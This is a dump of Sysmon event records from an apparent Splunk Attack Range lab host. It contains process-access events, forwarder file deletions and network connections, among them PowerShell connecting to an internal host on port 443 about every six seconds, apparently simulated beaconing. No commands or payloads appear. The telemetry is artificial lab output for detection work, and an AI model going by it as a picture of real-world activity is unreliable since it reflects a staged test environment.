13:13:39.274{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496727Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:39.274{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496726Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:13:39.274{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496725Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:39.274{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-A003-6140-6656-04000000C801}6680C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496724Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:39.274{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A003-6140-6656-04000000C801}6680C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496723Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:39.260{B81B27B7-A003-6140-6656-04000000C801}6680C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036496734Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:40.542{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67D54069ED57B1900E59529C3172849B,SHA256=D1E644F306E1C8105E50EFA7B4B28FB226AEF270DF4C65B9B7A019A037F45565,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000036496733Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:40.305{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C44DD6E2696240D5B32223A1074592E0,SHA256=9FDA52AF63850B1AA92023348C2789E45802F8BCFF5F3956B46CCBBD65864095,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496736Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:41.587{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2388EB727913EA2D1FFB77E811E3E6B5,SHA256=796FC067CB3F25CCCFC33444B4A64C0BACEDE7E0AEC282F270BC8445C2F044D5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496735Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:10.855{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50447-false10.0.1.12-8000- 23542300x800000000000000036496738Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:42.870{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=9A466B7F0EA5FD0492F402754F9E471E,SHA256=5CEAB283ECC7F10618A8A53B847C7C341B5ACB6A1AD1E2DEE32B5C88222FC044,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000036496737Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:42.601{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BE8EFA04FB6FA89EB27938469177981,SHA256=95806EA34F81C4431C47D03E0FF6582193FC9C2E9117C41AA1A72D0AA85A3CF1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496740Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:43.618{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=502372EDC3A8B997639561C12CBDDDBC,SHA256=1BD2308882E746756C4CD07D627F6FFBF1EEF1775F3A2FA29954CC32543F7A38,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496739Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:13.401{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50448-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496741Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:44.637{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3BAF4DCB09824221A7D15E470C02113,SHA256=FE6780BC2DFFAE29625F8BBFA8715A0A4D512D5FD9902DB122FBBC3283A151B6,IMPHASH=00000000000000000000000000000000falsefalse - 
insufficient disk space 23542300x800000000000000036496743Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:45.651{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE91342DDC18DE1C3C406CA9CF1A220B,SHA256=9A81D74F69A337E8F362961A65353AB5B78366548320427BBB2EA5ACFEA4D606,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496742Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:15.918{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50449-false10.0.1.12-8000- 23542300x800000000000000036496744Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:46.674{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5966F76468A655F40190D02A61711BDB,SHA256=56F8F64FE018A0EF8DB216E2114A7AD56BEF45A4B5FF65751C7C69FB11464691,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496745Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:47.688{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B3BB2509B3FD43E625B9DD0D7A204D7,SHA256=C4FAD24A4B5C2B2A72F26DD0F4DF5FBB40B6CC6483BF58AFCCBED7173C9B64E2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496747Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:48.841{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=9568FD96B9376E67D52545C0F7F1AB91,SHA256=7970B6A0A085F1A6BEA24B9ABDD75E2A1764BAA9A9303221853873A14040BCD7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496746Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:48.722{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D32DC12FD6FEB3B54F21558D406285F,SHA256=CC8B1FCCBCC3EFF9991E38E8DCA714224DFA08288F6B33EF0C54E5E5958BBD34,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496749Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:19.406{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50450-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496748Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:49.725{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5BE8705824E30C98412F152D338B1192,SHA256=27262D8AB51BC167CDFA4E22EC1E393D0F74CE5DE66EC85F901FACF4C8AFA803,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496750Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:50.755{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AAD2ECB98ABE1F3463228719552D344A,SHA256=21E33C0AA349C99B8337B2ED5440EEA86933F075DFF539A4B592C35C1C711803,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496751Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:51.801{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66A504D0F1D676CFFFF2F8AD91D150A8,SHA256=8D8219F658715105C55F34F0A1BC0AECAF54AF8C6BD914DDE4C1BAF63AD1CE7C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496753Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:52.817{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F9C53D14A158C0D5D1F2565D1EC9A36,SHA256=579082B13D86AD4233C5C058C8E545A29A454CAF2530F0D6040DC4C7CC86E5F1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient 
disk space 354300x800000000000000036496752Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:21.921{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50451-false10.0.1.12-8000- 23542300x800000000000000036496754Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:53.836{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B71124AD041C9B90341B3E2539E8D4BE,SHA256=DBBFA9F3FB4A61F6B488658115FBD0239B772C1682DB3B2E929E558D36B101CE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496756Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:54.965{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=3C5E114E68ABA40D95C8FC8F845C1F85,SHA256=89ECF6CF950D0170E6457C17527A3E07AFD1EF5659D22E5CC4950EE8D039CFDF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496755Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:54.850{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1684EFA02EF170CD5DBCDF62554D3AEA,SHA256=3CA40F5633925C289FADADD0F433508472650DD29212A7403BF11240CB6CC2D4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496758Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:55.880{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37505135BB8EB6EB3100BB5CBD0503D6,SHA256=5F66E34505F2D4FEC57E61C88A188E141CBF516EBB20D467FEE59C8E9FE98B63,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496757Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:25.417{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50452-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496760Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:56.894{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6858F6A39F474234079C4063A5F45E6,SHA256=C26A621141A31424A3A23248FE3D7F933DDF22AF60328C04219DC47FBA08897B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496759Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:13:56.279{B81B27B7-2BC4-612D-7CF4-01000000C801}4056ATTACKRANGE\REED_SCHMIDTC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\reed_schmidt\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\4056.xml~RF8a2f9327.TMPMD5=7FFA55FF6AC84742FC67B49B83BE3F12,SHA256=786CB96E30E42C16784374E9E5E14298976752E69CFAAF7FCB2ED016D9E3B6BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496762Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:57.911{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51806C1F2ED0AEA4FEFF2FFEC7FE6DEE,SHA256=47DA788EA94EE777BCEA2B8C546AC6DC38077E8C9B07F5A57FC4EAA3050D611B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496761Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:27.714{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50453-false10.0.1.12-8000- 23542300x800000000000000036496763Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:58.930{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89DAC47A92B9116C558444384A2DDA60,SHA256=CC0F9563447E489D06E16F8146AD188E64472542BDC55DC25F8864D92DB2590B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000036496765Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:59.945{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18BDFBC8702D6D6EAAC2CE46AE5A01AA,SHA256=3612CDB3379A6DD44994FB674B3C19FE6FD9DA257040430A40DA6C681B144578,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496764Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:59.761{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=CD0B5964D4CE1ECF2A19B9D141B806DC,SHA256=D100C35DAC50C8F9F75DB6602A785EBCA5F18DC285161A54AA07F7D51AAE5A2C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496767Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:00.959{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C492B14D84669A73320FEBFBA013D06D,SHA256=894BB7455B12B57AD25E9D7FACD6A573FB4D7380F45CD599A70A04E08D29159E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496766Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:14:30.427{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50454-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496768Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:01.974{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B65848EFEEC0135296A49DB4CB4DA172,SHA256=50613ABEFAB4B3ED8AEF182B3E1B971A5E54C14078483922946F923E2F82F0F5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496769Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:03.010{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22DB7DFD951C391F3B57FC12EDFECE03,SHA256=15A441B835E1A8E35B4C89B499073C5C3F53B81DFD053924A0D58C1CF6711BA4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496771Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:04.024{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27222EBBBD6D63AABC0C02794DC0526D,SHA256=99B80CFCB1AC109A7A555E61F1A97F5F528286BCA3D5C811CBB1740A717EB155,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
354300x800000000000000036496770Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:33.739{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50455-false10.0.1.12-8000- 23542300x800000000000000036496773Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:05.769{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=25BD7137D61443F0A64F553C046788E5,SHA256=06499F1294ED0D6516A8E22139D71A88CE4E040B6F87E10EBFC0382C0F02B522,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496772Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:05.070{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0C632A4A49E1F6973F1959CF7F208B0,SHA256=AFD20907D78F571534F3C3677DC4513A7DBB08D8532809F573FEA93878E03AC6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 